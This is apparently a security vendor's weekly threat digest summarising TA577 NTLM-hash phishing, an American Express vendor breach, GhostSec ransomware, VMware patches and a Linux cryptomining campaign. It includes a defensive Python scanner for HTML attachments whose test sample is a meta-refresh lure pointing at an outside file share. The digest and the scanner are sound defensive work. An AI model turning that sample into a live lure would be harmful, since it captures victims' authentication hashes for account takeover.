American Express issues credit card data breach alert
- SISA Weekly Threat Watch -
Last week’s cybersecurity landscape witnessed a surge in sophisticated threats, including phishing campaigns targeting NTLM hashes, data breaches affecting American Express customers, ransomware collaboration between GhostSec and Stormous, critical security patches from VMware, and a new Linux malware campaign exploiting vulnerabilities in Docker, Apache Hadoop, Redis, and Confluence. Posing significant risks to organizations, these diverse threats emphasize the importance of proactive security measures and regular audits.
SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.
1. TA577 phishing campaign: Stealing NTLM hashes for account hijacks
TA577, a hacking group, has adopted phishing emails to steal NT LAN Manager (NTLM) authentication hashes, employing a new tactic involving ZIP archives containing HTML files that trigger automatic connections to capture hashes. Their recent campaign targeted employees globally, masquerading as replies to previous discussions and including ZIP attachments with crafted HTML files. Upon opening, these files initiate connections to a malicious Server Message Block (SMB) server controlled by the attackers, enabling the capture of NTLM hashes associated with connected devices.
While the phishing emails did not deliver malware payloads, they aimed solely to capture NTLM hashes, with attackers potentially utilizing these hashes in “pass-the-hash” attacks. To mitigate such risks, organizations can block outbound SMB connections and implement email filtering to prevent zipped HTML file-based attacks.
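As an added, defender-side example that is not part of the advisory: a mail-gateway style check for an HTML attachment that would make the opening client reach an SMB share (a `file:` URL or UNC path in an auto-dereferenced attribute or a meta-refresh target), reporting external hosts separately from internal ones so the outbound-SMB exposure the advisory describes can be flagged before delivery. The hostnames, the `.corp.example` allow-list and the sample HTML are constructed for illustration.

```python
import ipaddress
import re
from html.parser import HTMLParser

URL_ATTRS = {"src", "href", "action", "data", "background", "poster"}  # auto-dereferenced
META_URL_RE = re.compile(r"url\s*=\s*['\"]?([^'\"\s;]+)", re.IGNORECASE)
TRUSTED_SUFFIXES = (".corp.example",)  # constructed allow-list of internal DNS suffixes

def smb_target_host(url):
    """Host an SMB-capable client would contact for a file: URL or UNC path, else None."""
    u = url.strip()
    if not (u.lower().startswith("file:") or u.startswith("\\\\")):
        return None  # http(s), mailto, relative paths: no SMB hop
    rest = u[5:] if u[:5].lower() == "file:" else u
    host = re.split(r"[/\\]", rest.lstrip("/\\"), maxsplit=1)[0]
    if not host or re.fullmatch(r"[A-Za-z]:", host):
        return None  # file:///C:/... is a local path, not a network share
    return host.rsplit("@", 1)[-1].split(":")[0].lower()
def is_internal(host):
    """Private-range IP literals and trusted DNS suffixes count as internal."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return host.endswith(TRUSTED_SUFFIXES)
class ShareRefFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, attribute, host) for each reference that would trigger SMB

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        candidates = [(n, v) for n, v in a.items() if n in URL_ATTRS]
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = META_URL_RE.search(a.get("content", ""))  # navigates on load, no click needed
            candidates += [("content", m.group(1))] if m else []
        for name, value in candidates:
            host = smb_target_host(value)
            if host is not None:
                self.findings.append((tag, name, host))
def scan_html_attachment(html):
    """Return SMB-reachable hosts the HTML references, split into external and internal."""
    parser = ShareRefFinder()
    parser.feed(html)
    parser.close()
    hosts = {h for _, _, h in parser.findings}
    return {"external": sorted(h for h in hosts if not is_internal(h)),
            "internal": sorted(h for h in hosts if is_internal(h))}
# Constructed sample in the shape the advisory describes: a meta refresh to an outside share.
SAMPLE = ('<html><head><meta http-equiv="refresh" content="0; url=file://drop.example.net/s/p">'
          '</head><body><img src="\\\\fileserver.corp.example\\share\\logo.png"></body></html>')
```

A non-empty `external` list is the condition to quarantine on; `internal` hits are normal for intranet mail and are reported only so the allow-list can be tuned.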
2. American Express warns of credit card exposure in vendor data breach
American Express has warned customers of a data breach involving the exposure of credit card information due to a breach at one of its service providers, impacting some Card Members. The breach, affecting credit card account numbers, names, and expiration dates, occurred at the service provider used by American Express’s travel services division, leading to unauthorized access to customer data.
While the exact number of impacted customers and the identity of the service provider remain unclear, American Express has notified regulatory authorities and is informing affected customers. The company assures that its own systems were not compromised, and customers will not be held responsible for fraudulent charges. To mitigate potential risks, American Express advises customers to monitor their account statements for suspicious activity for the next 12 to 24 months, enable instant notifications through the mobile app, and consider requesting a new card number if their information was stolen.
3. GhostSec and Stormous collaborate on ransomware campaign targeting 15+ countries
GhostSec, a cybercrime group affiliated with The Five Families coalition, has emerged as a significant player in the ransomware landscape, notably with the GhostLocker variant. Collaborating with the Stormous ransomware group, GhostSec conducts double extortion attacks targeting various business verticals across multiple countries. Their latest iteration, GhostLocker 2.0, written in the Go programming language, features enhanced encryption capabilities and a new ransom note urging victims to contact them within a specific timeframe to prevent data leakage.
Additionally, GhostSec has launched a ransomware-as-a-service (RaaS) program called STMX_GhostLocker and developed tools like the GhostSec Deep Scan toolset and GhostPresser for cross-site scripting attacks, targeting victims across various industries in numerous countries. Threats like this underscore the critical need for robust endpoint protection, web scanning, email security, malware analysis tools, and secure internet gateways to mitigate their malicious activities.
4. VMware issues security patches for ESXi, Workstation, and Fusion flaws
VMware has issued critical security updates to address sandbox escape vulnerabilities present in VMware ESXi, Workstation, Fusion, and Cloud Foundation products, posing a significant risk of unauthorized access to host systems or compromising the isolation of other virtual machines. These vulnerabilities, identified as CVE-2024-22252 to CVE-2024-22255, with CVSS v3 scores ranging from 7.1 to 9.3, allow attackers with local administrative privileges on virtual machines to execute code within the VMX process on the host. Notably, CVE-2024-22254 is an out-of-bounds write flaw in ESXi, while CVE-2024-22255 is an information disclosure issue affecting ESXi, Workstation, and Fusion.
VMware advises promptly applying the latest security updates and patches, especially for older ESXi versions 6.7 (6.7U3u) and 6.5 (6.5U3v), and for VCF 3.x, and recommends carefully assessing the impact on connectivity when implementing workarounds like removing USB controllers from virtual machines. Additionally, administrators are encouraged to subscribe to the VMSA mailing list for proactive alerts regarding exploitation status changes.
5. Linux malware campaign targets Docker, Apache Hadoop, Redis and Confluence
Cyber attackers are exploiting misconfigured servers running Apache Hadoop YARN, Docker, Confluence, or Redis using a new Golang-based malware, and leveraging an old, long-patched vulnerability in Atlassian Confluence to execute unauthorized code. Cloud forensics experts uncovered the attack, which involved bash scripts and Golang ELF binaries, resembling previous cloud assaults attributed to threat actors like TeamTNT and WatchDog.
The campaign targeted specific ports associated with the aforementioned services, deploying Golang payloads to initiate cryptocurrency mining operations, establish persistence, and launch further remote code execution exploits. Although antivirus engines can detect the payloads, the Golang binaries used for service discovery exhibited minimal detection rates, highlighting the need for regular security audits, patching, and network segmentation to mitigate such threats.
To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.
For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.